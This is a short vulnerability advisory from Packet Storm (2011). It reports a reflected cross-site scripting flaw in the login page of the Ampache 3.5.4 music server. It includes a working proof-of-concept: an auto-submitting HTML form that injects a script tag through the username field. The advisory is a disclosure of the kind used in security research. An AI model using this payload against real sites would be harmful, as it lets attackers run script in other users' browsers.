Ampache 3.5.4 Cross Site Scripting

2011-05-09T00:00:00
ID PACKETSTORM:101232
Type packetstorm
Reporter AutoSec Tools
Modified 2011-05-09T00:00:00

Description

                                        
                                            `<!------------------------------------------------------------------------  
# Software................Ampache 3.5.4  
# Vulnerability...........Reflected Cross-site Scripting  
# Threat Level............Low (1/5)  
# Download................http://ampache.org/  
# Discovery Date..........5/5/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# Email...................John Leitch <john@autosectools.com>  
# ------------------------------------------------------------------------  
#   
#   
# --Description--  
#   
# A reflected cross-site scripting vulnerability in Ampache 3.5.4 can be  
# exploited to execute arbitrary JavaScript.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/ampache-3.5.4/login.php">  
<input type="hidden" name="username" value=""><script>alert(0)</script>" />   
</form>  
</body>  
</html>  
`